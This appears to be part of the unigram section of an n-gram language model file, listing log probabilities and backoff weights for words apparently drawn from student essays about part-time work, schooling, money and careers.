-3.9746375 authorities -0.098042734
-3.8506508 schools -0.098042734
-3.340989 local -0.098042764
-3.9746375 governments -0.098042734
-3.9746375 proactive -0.098042734
-3.8506508 setting -0.098042734
-3.8506508 appropriate -0.098042734
-3.5348082 policy -0.098042734
-3.9746375 measures -0.098042734
-3.8506508 avoid -0.098042734
-3.9746375 pitfalls -0.098042734
-3.678229 including -0.098042734
-3.9746375 exploitation -0.098042734
-3.9746375 abuse -0.098042734
-3.9746375 excessive -0.098042734
-3.9746375 absenteeism -0.098042734
-3.9746375 gross -0.098042734
-3.9746375 negligence -0.098042734
-3.8506508 schooling -0.098042734
-3.8506508 purposes -0.098042734
-3.9746375 i -0.098042734
-3.9746375 attain -0.098042734
-3.9746375 competency -0.098042734
-3.8506508 attitude -0.098042734
-3.8506508 desired -0.098042734
-3.9746375 expertise -0.098042734
-3.9746375 ii -0.098042734
-3.8506508 finish -0.098042734
-3.4271748 lose -0.098042764
-3.8506508 sight -0.21423665
-3.9746375 gains -0.098042734
-3.678229 four -0.17195599
-3.9746375 corners -0.098042734
-3.9746375 classroom -0.098042734
-3.8506508 Thus -0.21423665
-3.2691073 balance -0.098042734
-3.9746375 necessarily -0.098042734
-3.8506508 points -0.098042734
-3.8506508 argument -0.21423665
-3.9746375 unless -0.098042734
-3.9746375 decision -0.098042734
-3.9746375 attainment -0.098042734
-3.8506508 organizational -0.21423665
-3.8506508 socially -0.098042734
-3.5348082 current -0.098042734
-3.9746375 consist -0.098042734
-3.8506508 mainly -0.098042734
-3.678229 fast -0.098042734
-3.9746375 manual -0.098042734
-3.5348082 invaluable -0.098042734
-3.9746375 targeted -0.098042734
-3.9746375 Balancing -0.098042734
-3.678229 schedules -0.098042734
-3.9746375 arranging -0.098042734
-3.8506508 effective -0.098042734
-3.340989 assist -0.17195599
-3.4271748 becoming -0.37108302
-3.5348082 daily -0.14086568
-3.9746375 presently -0.098042734
-3.8506508 prepare -0.098042734
-3.8506508 car -0.098042734
-3.8506508 post -0.098042734
-3.678229 careers -0.21423665
-3.9746375 passed -0.098042734
-3.8506508 extremely -0.098042734
-3.9746375 Potential -0.098042734
-3.9746375 impressed -0.098042734
-3.9746375 interviews -0.098042734
-3.8506508 cities -0.098042734
-3.9746375 socio-economic -0.098042734
-3.9746375 backgrounds -0.098042734
-3.9746375 partly -0.098042734
-3.2691073 complete -0.12430835
-3.9746375 professionally -0.098042734
-3.9746375 educated -0.098042734
-3.678229 contributing -0.17195599
-3.9746375 prepared -0.098042734
-3.9746375 challenges -0.098042734
-3.9746375 ends -0.098042734
-3.340989 develop -0.12430835
-3.8506508 stronger -0.098042734
-3.9746375 When -0.098042734
-3.9746375 appropriately -0.098042734
-3.9746375 dressed -0.098042734
-3.9746375 consequences -0.098042734
-3.9746375 actions -0.098042734
-3.9746375 She -0.098042734
-3.8506508 wait -0.21423665
-3.9746375 naive -0.098042734
-3.9746375 mistakes -0.098042734
-3.678229 critical -0.098042734
-3.9746375 favor -0.098042734
-3.8506508 variety -0.21423665
-3.8506508 classmates -0.098042734
-3.9746375 maybe -0.098042734
-3.4271748 together -0.14086568
-3.8506508 thinking -0.098042734
-3.9746375 closer -0.098042734
-3.9746375 along -0.098042734
-3.9746375 belief -0.098042734
-3.8506508 recognize -0.098042734
-3.678229 lectures -0.17195599
-3.8506508 meetings -0.098042734
-3.9746375 Otherwise -0.098042734
-3.9746375 poorer -0.098042734
-3.9746375 disadvantage -0.098042734
-3.9746375 compared -0.098042734
-3.8506508 wealthy -0.098042734
-3.5348082 pass -0.098042734
-3.678229 ever -0.098042734
-3.8506508 experiencing -0.098042734
-3.678229 regular -0.098042734
-3.9746375 empathy -0.098042734
-3.8506508 modern -0.098042734
-3.9746375 politics -0.098042734
-3.9746375 justice -0.098042734
-3.9746375 Universities -0.098042734
-3.9746375 award -0.098042734
-3.9746375 credits -0.098042734
-3.9746375 volunteer -0.098042734
-3.9746375 all-round -0.098042734
-3.9746375 count -0.098042734
-3.5348082 towards -0.098042734
-3.9746375 degrees -0.098042734
-3.9746375 School -0.098042734
-3.678229 expensive -0.098042734
-3.9746375 costly -0.098042734
-3.9746375 assisting -0.098042734
-3.678229 busy -0.098042734
-3.9746375 professionals -0.098042734
-3.9746375 sources -0.098042734
-3.8506508 doubt -0.098042734
-3.2691073 spent -0.14589529
-3.9746375 figuring -0.098042734
-3.678229 personally -0.098042734
-3.9746375 usual -0.098042734
-3.4271748 form -0.37108302
-3.9746375 profession -0.098042734
-3.8506508 nice -0.098042734
-3.9746375 speed -0.098042734
-3.9746375 certified -0.098042734
-3.8506508 receive -0.098042734
-3.8506508 faster -0.098042734
-3.9746375 raise -0.098042734
-3.5348082 children -0.1605951
-3.4271748 choose -0.18983142
-3.9746375 interact -0.098042734
-3.678229 community -0.098042734
-3.9746375 epeople-skills -0.098042734
-3.0622365 had -0.22503476
-3.9746375 14 -0.098042734
-3.678229 old -0.17195599
-3.9746375 pharmacy -0.098042734
-3.9746375 capable -0.098042734
-3.8506508 appreciation -0.21423665
-3.4271748 required -0.18837766
-3.9746375 interacting -0.098042734
-3.5348082 public -0.14086568
-3.9746375 juggle -0.098042734
-3.9746375 surprised -0.098042734
-3.9746375 came -0.098042734
-3.8506508 bring -0.098042734
-3.9746375 maturity -0.098042734
-3.678229 currently -0.098042734
-3.5348082 purely -0.098042734
-3.9746375 Hence -0.098042734
-3.8506508 1 -0.098042734
-3.9746375 interesting -0.098042734
-3.9746375 replacement -0.098042734
-3.678229 2 -0.098042734
-3.340989 everything -0.098042734
-3.5348082 given -0.098042734
-3.678229 3 -0.098042734
-3.9746375 relates -0.098042734
-3.9746375 Sometimes -0.098042734
-3.9746375 salary -0.098042734
-3.9746375 resume -0.098042734
-3.8506508 4 -0.098042734
-3.9746375 mentors -0.098042734
-3.9746375 Thank -0.098042734
-3.9746375 explain -0.098042734
-3.9746375 Reason -0.098042734
-3.9746375 survive -0.098042734
-3.9746375 With -0.098042734
-3.9746375 struggle -0.098042734
-3.9746375 continual -0.098042734
-3.8506508 excellent -0.098042734
-3.340989 long -0.098042764
-3.9746375 length -0.098042734
-3.8506508 vacation -0.098042734
-3.9746375 Which -0.098042734
-3.8506508 greatly -0.098042734
-3.8506508 wasted -0.21423665
-3.9746375 lazy -0.098042734
-3.8506508 unproductive -0.098042734
-3.9746375 Or -0.098042734
-3.8506508 nights -0.098042734
-3.9746375 travel -0.098042734
-3.9746375 persons -0.098042734
-3.4271748 growth -0.14086568
-3.9746375 multicultural -0.098042734
-3.678229 off -0.098042734
-3.9746375 eIt -0.098042734
-3.9746375 employability -0.098042734
-3.9746375 field\/industry -0.098042734
-3.9746375 ereal -0.098042734
-3.9746375 suited -0.098042734
-3.5348082 look -0.14086568
-3.8506508 path -0.098042734
-3.9746375 homework\/assignments -0.098042734
-3.9746375 At -0.098042734
-3.9746375 input -0.098042734
-3.5348082 using -0.098042734
-3.8506508 initiative -0.098042734
-3.9746375 solving -0.098042734
-3.9746375 communication -0.098042734
-3.8506508 customer -0.098042734
-3.9746375 uniforms -0.098042734
-3.9746375 Being -0.098042734
-3.8506508 brings -0.098042734
-3.9746375 pointed -0.098042734
-3.9746375 real-world -0.098042734
-3.9746375 complement -0.098042734
-3.9746375 Also -0.098042734
-3.2074509 spending -0.12430835
-3.5348082 certainly -0.098042734
-3.678229 welcome -0.098042734
-3.4271748 choice -0.098042734
-3.9746375 complements -0.098042734
-3.9746375 looking -0.098042734
-3.4271748 within -0.14086568
-3.8506508 lab -0.098042734
-3.678229 research -0.098042734
-3.9746375 assistant -0.098042734
-3.8506508 professor -0.098042734
-3.9746375 well-paying -0.098042734
-3.9746375 conveniently -0.098042734
-3.9746375 located -0.098042734
-3.9746375 content -0.098042734
-3.9746375 desirable -0.098042734
-3.678229 interested -0.35337758
-3.9746375 although -0.098042734
-3.9746375 scenario -0.098042734
-3.9746375 leads -0.098042734
-3.9746375 existentially -0.098042734
-3.9746375 themed -0.098042734
-3.9746375 questions -0.098042734
-3.9746375 Regardless -0.098042734
-3.8506508 profit -0.098042734
-3.9746375 prioritize -0.098042734
-3.8506508 merit -0.098042734
-3.9746375 significant -0.098042734
-3.678229 expense -0.098042734
-3.9746375 capital -0.098042734
-3.8506508 thereby -0.098042734
-3.8506508 cover -0.098042734
-3.9746375 bank -0.098042734
-3.678229 loan -0.098042734
-3.9746375 mortgaging -0.098042734
-3.9746375 house -0.098042734
-3.678229 puts -0.17195599
-3.9746375 strain -0.098042734
-3.9746375 financing -0.098042734
-3.5348082 materials -0.14086568
-3.9746375 reducing -0.098042734
-3.9746375 pressure -0.098042734
-3.9746375 encouraging -0.098042734
-3.5348082 large -0.098042734
-3.9746375 percentage -0.098042734
-3.9746375 shoppers -0.098042734
-3.9746375 notice -0.098042734
-3.8506508 changes -0.098042734
-3.9746375 fashion -0.098042734
-3.9746375 technology -0.098042734
-3.678229 buy -0.098042734
-3.9746375 latest -0.098042734
-3.9746375 products -0.098042734
-3.9746375 reviving -0.098042734
-3.9746375 shops -0.098042734
-3.678229 low -0.098042734
-3.9746375 shop -0.098042734
-3.9746375 owners -0.098042734
-3.8506508 onto -0.098042734
-3.153469 me -0.12131027
-3.8506508 seems -0.17195599
-3.8506508 carry -0.098042734
-3.9746375 task -0.098042734
-3.5348082 goal -0.098042734
-3.678229 rewarding -0.17195599
-3.9746375 mention -0.098042734
-3.9746375 Basic -0.098042734
-3.9746375 Looking -0.098042734
-3.8506508 seeing -0.098042734
-3.9746375 payback -0.098042734
-3.5348082 over -0.098042734
-3.8506508 everyday -0.098042734
-3.9746375 irresponsible -0.098042734
-3.9746375 breakdown -0.098042734
-3.678229 economic -0.098042734
-3.9746375 happing -0.098042734
-3.9746375 Using -0.098042734
-3.9746375 false -0.098042734
-3.9746375 card -0.098042734
-3.9746375 constantly -0.098042734
-3.9746375 pushing -0.098042734
-3.8506508 care -0.21423665
-3.9746375 bill -0.098042734
-3.5348082 banned -0.1281937
-3.5348082 number -0.47831634
-3.8506508 goes -0.098042734
-3.8506508 didn -0.21423665
-3.9746375 dime -0.098042734
-3.9746375 tuitions -0.098042734
-3.8506508 summer -0.098042734
-3.9746375 vacations -0.098042734
-3.9746375 summers -0.098042734
-3.9746375 Furthermore -0.098042734
-3.5348082 schedule -0.098042734
-3.9746375 got -0.098042734
-3.9746375 graduating -0.098042734
-3.678229 already -0.098042734
-3.9746375 experienced -0.098042734
-3.9746375 requirements -0.098042734
-3.8506508 c -0.098042734
-3.8506508 seen -0.098042734
-3.5348082 extra-curricular -0.274173
-3.9746375 hiring -0.098042734
-3.9746375 bubble -0.098042734
-3.678229 leaving -0.098042734
-3.8506508 head -0.098042734
-3.5348082 creating -0.1522653
-3.9746375 failures -0.098042734
-3.9746375 realistic -0.098042734
-3.9746375 adjusting -0.098042734
-3.9746375 \/ -0.098042734
-3.4271748 employees -0.098042734
-3.9746375 wont -0.098042734
-3.9746375 burn -0.098042734
-3.9746375 gauge -0.098042734
-3.9746375 assessing -0.098042734
-3.9746375 multi-task -0.098042734
-3.9746375 grade -0.098042734
-3.9746375 averages -0.098042734
-3.9746375 devised -0.098042734
-3.9746375 formula -0.098042734
-3.9746375 feels -0.098042734
-3.9746375 excels -0.098042734
-3.9746375 assignment -0.098042734
-3.8506508 Finally -0.21423665
-3.678229 general -0.098042734
-3.9746375 Idle -0.098042734
-3.9746375 minds -0.098042734
-3.9746375 deserves -0.098042734
-3.9746375 needy -0.098042734
-3.9746375 face -0.098042734
-3.678229 difficulties -0.098042734
-3.9746375 Incomes -0.098042734
-3.9746375 necessities -0.098042734
-3.8506508 purchase -0.098042734
-3.8506508 dedication -0.098042734
-3.9746375 unreasonable -0.098042734
-3.9746375 inherent -0.098042734
-3.9746375 structures -0.098042734
-3.9746375 exist -0.098042734
-3.9746375 Early -0.098042734
-3.8506508 formal -0.098042734
-3.9746375 adjust -0.098042734
-3.8506508 demand -0.098042734
-3.9746375 involvement -0.098042734
-3.9746375 Both -0.098042734
-3.8506508 private -0.098042734
-3.8506508 utmost -0.098042734
-3.8506508 New -0.21423665
-3.9746375 Zealand -0.098042734
-3.9746375 enabled -0.098042734
-3.9746375 continued -0.098042734
-3.5348082 tertiary -0.14086568
-3.9746375 monthly -0.098042734
-3.9746375 housing -0.098042734
-3.9746375 teenagers -0.098042734
-3.9746375 move -0.098042734
-3.9746375 spread -0.098042734
-3.9746375 wings -0.098042734
-3.9746375 Ultimately -0.098042734
-3.678229 wanted -0.098042734
-3.9746375 prove -0.098042734
-3.9746375 yourself -0.098042734
-3.9746375 Naturally -0.098042734
-3.678229 entertainment -0.17195599
-3.9746375 sponsored -0.098042734
-3.9746375 covered -0.098042734
-3.9746375 wasn -0.098042734
-3.8506508 left -0.098042734
-3.9746375 During -0.098042734
-3.9746375 gas -0.098042734
-3.9746375 station -0.098042734
-3.8506508 attendant -0.21423665
-3.9746375 kitchen -0.098042734
-3.8506508 video -0.098042734
-3.9746375 rental -0.098042734
-3.9746375 clerk -0.098042734
-3.9746375 parking -0.098042734
-3.5348082 finally -0.098042734
-3.9746375 porter -0.098042734
-3.9746375 provided -0.098042734
-3.9746375 communicative -0.098042734
-3.9746375 organize -0.098042734
-3.9746375 efficiently -0.098042734
-3.678229 opinions -0.17195599
-3.8506508 hands -0.21423665
-3.8506508 textbook -0.21423665
-3.9746375 selected -0.098042734
-3.9746375 programs -0.098042734
-3.9746375 seeking -0.098042734
-3.9746375 unsure -0.098042734
-3.9746375 undecided -0.098042734
-3.9746375 direction -0.098042734
-3.9746375 options -0.098042734
-3.9746375 brighter -0.098042734
-3.9746375 Third -0.098042734
-3.9746375 inspire -0.098042734
-3.9746375 excel -0.098042734
-3.9746375 senior -0.098042734
-3.9746375 Work -0.098042734
-3.9746375 comprehend -0.098042734
-3.9746375 Based -0.098042734
-3.9746375 discovering -0.098042734
-3.9746375 lifetime -0.098042734
-3.9746375 helping -0.098042734
-3.9746375 unmotivated -0.098042734
-3.9746375 sadder -0.098042734
-3.9746375 story -0.098042734
-3.678229 finished -0.098042734
-3.9746375 16 -0.098042734
-3.9746375 run -0.098042734
-3.8506508 challenge -0.098042734
-3.9746375 tried -0.098042734
-3.4271748 dealing -0.37108302
-3.9746375 boss -0.098042734
-3.9746375 Those -0.098042734
-3.9746375 Parents -0.098042734
-3.9746375 Doing -0.098042734
-3.9746375 shows -0.098042734
-3.9746375 longer -0.098042734
-3.8506508 ourselves -0.098042734
-3.9746375 taught -0.098042734
-3.9746375 special -0.098042734
-3.9746375 colleagues -0.098042734
-3.9746375 grow -0.098042734
-3.9746375 quicker -0.098042734
-3.9746375 glife -0.098042734
-3.678229 kids -0.098042734
-3.9746375 correct -0.098042734
-3.9746375 Throughout -0.098042734
-3.9746375 grandparents -0.098042734
-3.9746375 youngsters -0.098042734
-3.9746375 consumerist -0.098042734
-3.9746375 cell -0.098042734
-3.9746375 phones -0.098042734
-3.9746375 funded -0.098042734
-3.9746375 possession -0.098042734
-3.9746375 games -0.098042734
-3.8506508 clothes -0.098042734
-3.8506508 wage -0.098042734
-3.8506508 communicating -0.098042734
-3.5348082 groups -0.098042734
-3.8506508 etiquette -0.098042734
-3.9746375 spoken -0.098042734
-3.9746375 language -0.098042734
-3.678229 wish -0.274173
-3.9746375 teacher -0.098042734
-3.9746375 nursery -0.098042734
-3.9746375 cram -0.098042734
-3.9746375 tourism -0.098042734
-3.9746375 hotels -0.098042734
-3.9746375 tour -0.098042734
-3.9746375 guides -0.098042734
-3.678229 weekends -0.098042734
-3.9746375 challenging -0.098042734
-3.9746375 receiving -0.098042734
-3.8506508 thousands -0.21423665
-3.9746375 key -0.098042734
-3.9746375 leading -0.098042734
-3.9746375 join -0.098042734
-3.678229 attending -0.1522653
-3.678229 obtaining -0.17195599
-3.9746375 time-management -0.098042734
-3.9746375 semi-regular -0.098042734
-3.9746375 regimen -0.098042734
-3.9746375 oppressive -0.098042734
-3.9746375 thought-controlling -0.098042734
-3.9746375 atmosphere -0.098042734
-3.9746375 accustomed -0.098042734
-3.9746375 shock -0.098042734
-3.9746375 cloistered -0.098042734
-3.9746375 fascinating -0.098042734
-3.8506508 exists -0.098042734
-3.9746375 recommended -0.098042734
-3.9746375 norms -0.098042734
-3.9746375 contemporary -0.098042734
-3.678229 thought -0.098042734
-3.9746375 patterns -0.098042734
-3.9746375 apply -0.098042734
-3.9746375 mocked -0.098042734
-3.9746375 absurd -0.098042734
-3.9746375 occupying -0.098042734
-3.9746375 oneself -0.098042734
-3.678229 activity -0.098042734
-3.9746375 restricts -0.098042734
-3.4271748 habits -0.098042734
-3.9746375 deleterious -0.098042734
-3.9746375 Said -0.098042734
-3.9746375 extended -0.098042734
-3.9746375 periods -0.098042734
-3.9746375 game -0.098042734
-3.9746375 playing -0.098042734
-3.9746375 lounging -0.098042734
-3.9746375 sofa -0.098042734
-3.9746375 watching -0.098042734
-3.9746375 daytime -0.098042734
-3.9746375 television -0.098042734
-3.9746375 indulging -0.098042734
-3.9746375 repeated -0.098042734
-3.9746375 bouts -0.098042734
-3.9746375 binge -0.098042734
-3.9746375 equally -0.098042734
-3.9746375 dissolute -0.098042734
-3.9746375 obsessive -0.098042734
-3.9746375 devotion -0.098042734
-3.678229 online -0.098042734
-3.9746375 fleshpots -0.098042734
-3.9746375 promising -0.098042734
-3.8506508 sexual -0.098042734
-3.9746375 release -0.098042734
-3.9746375 exchange -0.098042734
-3.9746375 split -0.098042734
-3.9746375 behooves -0.098042734
-3.9746375 arrange -0.098042734
-3.9746375 bear -0.098042734
-3.9746375 mentioning -0.098042734
-3.9746375 One -0.098042734
-3.9746375 REAL -0.098042734
-3.9746375 Nor -0.098042734
-3.678229 efforts -0.1522653
-3.9746375 life-lesson -0.098042734
-3.9746375 tie-in -0.098042734
-3.9746375 failure -0.098042734
-3.9746375 disciplines -0.098042734
-3.9746375 achieve -0.098042734
-3.9746375 greatest -0.098042734
-3.9746375 assets -0.098042734
-3.9746375 control -0.098042734
-3.8506508 desires -0.21423665
-3.9746375 depend -0.098042734
-3.9746375 track -0.098042734
-3.8506508 spoiled -0.098042734
-3.678229 paid -0.17195599
-3.9746375 much-needed -0.098042734
-3.9746375 self -0.098042734
-3.8506508 transitional -0.21423665
-3.9746375 dependence -0.098042734
-3.678229 shall -0.098042734
-3.9746375 claim -0.098042734
-3.9746375 domestic -0.098042734
-3.9746375 front -0.098042734
-3.9746375 leaves -0.098042734
-3.9746375 security -0.098042734
-3.9746375 unit -0.098042734
-3.678229 begins -0.17195599
-3.9746375 strike -0.098042734
-3.9746375 course-load -0.098042734
-3.8506508 thoughts -0.21423665
-3.9746375 pecuniary -0.098042734
-3.8506508 changing -0.098042734
-3.8506508 hobbies -0.098042734
-3.9746375 assert -0.098042734
-3.9746375 starting -0.098042734
-3.9746375 Whether -0.098042734
-3.9746375 vary -0.098042734
-3.9746375 courting -0.098042734
-3.8506508 meeting -0.098042734
-3.9746375 viable -0.098042734
-3.9746375 whom -0.098042734
-3.9746375 Independent -0.098042734
-3.8506508 supporting -0.098042734
-3.9746375 stated -0.098042734
-3.9746375 fresh -0.098042734
-3.9746375 firm -0.098042734
-3.9746375 superiors -0.098042734
-3.9746375 life-skill -0.098042734
-3.9746375 enhancements -0.098042734
-3.9746375 Searching -0.098042734
-3.9746375 filling -0.098042734
-3.9746375 interview -0.098042734
-3.9746375 joys -0.098042734
-3.9746375 pain -0.098042734
-3.9746375 rejected -0.098042734
-3.9746375 cooperation -0.098042734
-3.9746375 humble -0.098042734
-3.9746375 relieve -0.098042734
-3.9746375 funding -0.098042734
-3.8506508 involved -0.21423665
-3.9746375 emphatically -0.098042734
-3.9746375 style -0.098042734
-3.8506508 individuals -0.098042734
-3.9746375 adulthood -0.098042734
-3.9746375 indispensable -0.098042734
-3.9746375 recommend -0.098042734
-3.9746375 opportune -0.098042734
-3.9746375 men -0.098042734
-3.8506508 women -0.098042734
-3.9746375 THEIR -0.098042734
-3.9746375 interpretation -0.098042734
-3.9746375 wonderful -0.098042734
-3.9746375 meaning -0.098042734
-3.8506508 applied -0.098042734
-3.9746375 exactly -0.098042734
-3.9746375 Dairy -0.098042734
-3.9746375 Queens -0.098042734
-3.9746375 Well -0.098042734
-3.8506508 handling -0.098042734
-3.9746375 accounts -0.098042734
-3.9746375 add -0.098042734
-3.8506508 comes -0.098042734
-3.8506508 indeed -0.098042734
-3.9746375 reduces -0.098042734
-3.9746375 note -0.098042734
-3.8506508 throughout -0.098042734
-3.9746375 Interestingly -0.098042734
-3.9746375 exercised -0.098042734
-3.678229 greater -0.098042734
-3.9746375 defray -0.098042734
-3.9746375 ever-increasing -0.098042734
-3.9746375 After -0.098042734
-3.8506508 creates -0.098042734
-3.9746375 burdens -0.098042734
-3.8506508 newly -0.098042734
-3.9746375 minted -0.098042734
-3.9746375 Reducing -0.098042734
-3.9746375 eliminating -0.098042734
-3.9746375 state -0.098042734
-3.8506508 population -0.098042734
-3.9746375 contact -0.098042734
-3.9746375 walks -0.098042734
-3.9746375 myriad -0.098042734
-3.9746375 cwhich -0.098042734
-3.9746375 isn -0.098042734
-3.9746375 couldn -0.098042734
-3.9746375 shocked -0.098042734
-3.9746375 perfected -0.098042734
-3.9746375 begging -0.098042734
-3.8506508 outright -0.098042734
-3.9746375 demanding -0.098042734
-3.9746375 shell -0.098042734
-3.9746375 outrageous -0.098042734
-3.8506508 amounts -0.21423665
-3.8506508 nothing -0.098042734
-3.8506508 wrong -0.098042734
-3.9746375 ski -0.098042734
-3.9746375 trips -0.098042734
-3.9746375 traveling -0.098042734
-3.8506508 enjoying -0.098042734
-3.678229 probably -0.17195599
-3.9746375 dollars -0.098042734
-3.9746375 namely -0.098042734
-3.9746375 consequently -0.098042734
-3.8506508 institutes -0.098042734
-3.8506508 household -0.098042734
-3.9746375 parental -0.098042734
-3.9746375 accommodation -0.098042734
-3.9746375 financed -0.098042734
-3.9746375 guardians -0.098042734
-3.9746375 sum -0.098042734
-3.9746375 subsidized -0.098042734
-3.8506508 third -0.098042734
-3.9746375 adequate -0.098042734
-3.9746375 expenditure -0.098042734
-3.9746375 yields -0.098042734
-3.8506508 double -0.098042734
-3.9746375 bonus -0.098042734
-3.9746375 character-building -0.098042734
-3.9746375 aspect -0.098042734
-3.9746375 influences -0.098042734
-3.9746375 younger -0.098042734
-3.9746375 earners -0.098042734
-3.9746375 professions -0.098042734
-3.9746375 terms -0.098042734
-3.9746375 diligence -0.098042734
-3.678229 said -0.17195599
-3.8506508 beginning -0.098042734
-3.8506508 relief -0.098042734
-3.5348082 due -0.47831634
-3.9746375 shown -0.098042734
-3.9746375 traumatizing -0.098042734
-3.9746375 totally -0.098042734
-3.9746375 pretty -0.098042734
-3.9746375 similarities -0.098042734
-3.678229 essentially -0.098042734
-3.9746375 sit -0.098042734
-3.9746375 quietly -0.098042734
-3.9746375 feet -0.098042734
-3.9746375 spontaneous -0.098042734
-3.9746375 feedback -0.098042734
-3.9746375 aren -0.098042734
-3.9746375 dimension -0.098042734
-3.9746375 perform -0.098042734
-3.9746375 somewhat -0.098042734
-3.9746375 lacking -0.098042734
-3.8506508 anyway -0.098042734
-3.8506508 remember -0.098042734
-3.9746375 paycheck -0.098042734
-3.9746375 impression -0.098042734
-3.9746375 gave -0.098042734
-3.9746375 seemed -0.098042734
-3.9746375 peculiar -0.098042734
-3.9746375 sort -0.098042734
-3.9746375 cautious -0.098042734
-3.9746375 apt -0.098042734
-3.8506508 Yet -0.098042734
-3.9746375 guess -0.098042734
-3.8506508 primary -0.21423665
-3.9746375 Anything -0.098042734
-3.9746375 membership -0.098042734
-3.9746375 supplementary -0.098042734
-3.9746375 Extra -0.098042734
-3.9746375 fast-food -0.098042734
-3.9746375 hopes -0.098042734
-3.9746375 computer -0.098042734
-3.9746375 programmer -0.098042734
-3.8506508 burger -0.098042734
-3.9746375 flipping -0.098042734
-3.9746375 decidedly -0.098042734
-3.4271748 negative -0.14086568
-3.9746375 first-year -0.098042734
-3.9746375 stretched -0.098042734
-3.9746375 thin -0.098042734
-3.9746375 college-level -0.098042734
-3.8506508 negligible -0.098042734
-3.9746375 fine -0.098042734
-3.9746375 take-up -0.098042734
-3.8506508 solely -0.098042734
-3.8506508 ' -0.098042734
-3.9746375 discretion -0.098042734
-3.9746375 sharpen -0.098042734
-3.9746375 in-class -0.098042734
-3.9746375 supplemented -0.098042734
-3.8506508 experiments -0.21423665
-3.9746375 casework -0.098042734
-3.8506508 virtually -0.098042734
-3.8506508 impossible -0.21423665
-3.9746375 heavy -0.098042734
-3.9746375 detriment -0.098042734
-3.8506508 physical -0.098042734
-2.9536004 health -0.1744344
-3.9746375 Everyone -0.098042734
-3.9746375 applies -0.098042734
-3.9746375 extracurricular -0.098042734
-3.9746375 What -0.098042734
-3.9746375 picking -0.098042734
-3.5348082 healthy -0.098042734
-3.9746375 devoting -0.098042734
-3.9746375 exercising -0.098042734
-3.8506508 recreational -0.098042734
-3.9746375 resumes -0.098042734
-3.9746375 well-rounded -0.098042734
-3.9746375 introduced -0.098042734
-3.9746375 tedious -0.098042734
-3.5348082 mind -0.098042734
-3.9746375 curious -0.098042734
-3.9746375 phase -0.098042734
-3.9746375 encountering -0.098042734
-3.9746375 share -0.098042734
-3.9746375 swimming -0.098042734
-3.9746375 chemistry -0.098042734
-3.9746375 light -0.098042734
-3.9746375 bulb -0.098042734
-3.9746375 cherished -0.098042734
-3.8506508 miss -0.098042734
-3.5348082 ideas -0.1522653
-3.9746375 academics -0.098042734
-3.9746375 dormitory -0.098042734
-3.8506508 offered -0.098042734
-3.678229 exposed -0.35337758
-3.9746375 group -0.098042734
-3.9746375 peers -0.098042734
-3.9746375 Living -0.098042734
-3.9746375 sharing -0.098042734
-3.8506508 dorm -0.098042734
-3.9746375 permanent -0.098042734
-3.9746375 bond -0.098042734
-3.678229 behind -0.098042734
-3.8506508 won -0.098042734
-3.9746375 ` -0.098042734
-3.9746375 t -0.098042734
-3.9746375 participate -0.098042734
-3.9746375 awareness -0.098042734
-3.9746375 worried -0.098042734
-3.9746375 Personally -0.098042734
-3.9746375 terribly -0.098042734
-3.9746375 starving -0.098042734
-3.9746375 deem -0.098042734
-3.8506508 dollar -0.098042734
-3.9746375 Don -0.098042734
-3.678229 40 -0.098042734
-3.9746375 45 -0.098042734
-3.8506508 exams -0.098042734
-3.9746375 clicks -0.098042734
-3.9746375 drugs -0.098042734
-3.9746375 rejection -0.098042734
-3.9746375 thrown -0.098042734
-3.9746375 dogs -0.098042734
-3.9746375 remainder -0.098042734
-3.9746375 paths -0.098042734
-3.8506508 distracting -0.098042734
-3.9746375 original -0.098042734
-3.9746375 decides -0.098042734
-3.9746375 deter -0.098042734
-3.9746375 he\/she -0.098042734
-3.9746375 energies -0.098042734
-3.9746375 conducive -0.098042734
-3.9746375 decisions -0.098042734
-3.9746375 open -0.098042734
-3.9746375 Failure -0.098042734
-3.8506508 larger -0.098042734
-3.9746375 possibility -0.098042734
-3.9746375 administration -0.098042734
-3.9746375 treating -0.098042734
-3.9746375 Consequently -0.098042734
-3.9746375 poses -0.098042734
-3.9746375 threat -0.098042734
-3.9746375 Money -0.098042734
-3.9746375 distracter -0.098042734
-3.9746375 boils -0.098042734
-3.678229 down -0.17195599
-3.9746375 networking -0.098042734
-3.9746375 landing -0.098042734
-3.9746375 ideal -0.098042734
-3.5348082 properly -0.098042734
-3.9746375 Training -0.098042734
-3.9746375 train -0.098042734
-3.9746375 temporary -0.098042734
-3.8506508 pursuit -0.21423665
-3.9746375 Any -0.098042734
-3.9746375 lay -0.098042734
-3.9746375 forgo -0.098042734
-3.9746375 physically -0.098042734
-3.9746375 forms -0.098042734
-3.8506508 exhaustion -0.098042734
-3.9746375 interferes -0.098042734
-3.9746375 offering -0.098042734
-3.9746375 weighed -0.098042734
-3.9746375 crisis -0.098042734
-3.8506508 middle -0.098042734
-3.9746375 aged -0.098042734
-3.9746375 couples -0.098042734
-3.9746375 elderly -0.098042734
-3.678229 heavily -0.098042734
-3.9746375 severely -0.098042734
-3.9746375 disparate -0.098042734
-3.9746375 Currently -0.098042734
-3.9746375 Why -0.098042734
-3.9746375 dropout -0.098042734
-3.9746375 losing -0.098042734
-3.9746375 trapped -0.098042734
-3.9746375 image -0.098042734
-3.9746375 goods -0.098042734
-3.9746375 exciting -0.098042734
-3.8506508 versus -0.098042734
-3.9746375 boring -0.098042734
-3.9746375 uninteresting -0.098042734
-3.9746375 Communication -0.098042734
-3.9746375 media -0.098042734
-3.9746375 typical -0.098042734
-3.8506508 smaller -0.098042734
-3.8506508 possibly -0.098042734
-3.9746375 gather -0.098042734
-3.8506508 seek -0.098042734
-3.8506508 establishments -0.098042734
-3.8506508 bars -0.098042734
-3.8506508 nightclubs -0.098042734
-3.8506508 obvious -0.098042734
-3.9746375 attracted -0.098042734
-3.8506508 lucrative -0.098042734
-3.9746375 tips -0.098042734
-3.8506508 Las -0.21423665
-3.9746375 Vegas -0.098042734
-3.9746375 casino -0.098042734
-3.9746375 mesmerized -0.098042734
-3.9746375 winning -0.098042734
-3.9746375 tables -0.098042734
-3.9746375 nationwide -0.098042734
-3.9746375 boom -0.098042734
-3.8506508 Texas -0.21423665
-3.9746375 Hold -0.098042734
-3.9746375 eEm -0.098042734
-3.9746375 Poker -0.098042734
-3.8506508 North -0.21423665
-3.9746375 Recently -0.098042734
-3.678229 poker -0.098042734
-3.8506508 players -0.098042734
-3.9746375 diploma -0.098042734
-3.8506508 popular -0.098042734
-3.9746375 evolved -0.098042734
-3.9746375 skilled -0.098042734
-3.9746375 luck -0.098042734
-3.8506508 prize -0.21423665
-3.9746375 trend -0.098042734
-3.9746375 swept -0.098042734
-3.9746375 continues -0.098042734
-3.9746375 Playing -0.098042734
-3.9746375 addictive -0.098042734
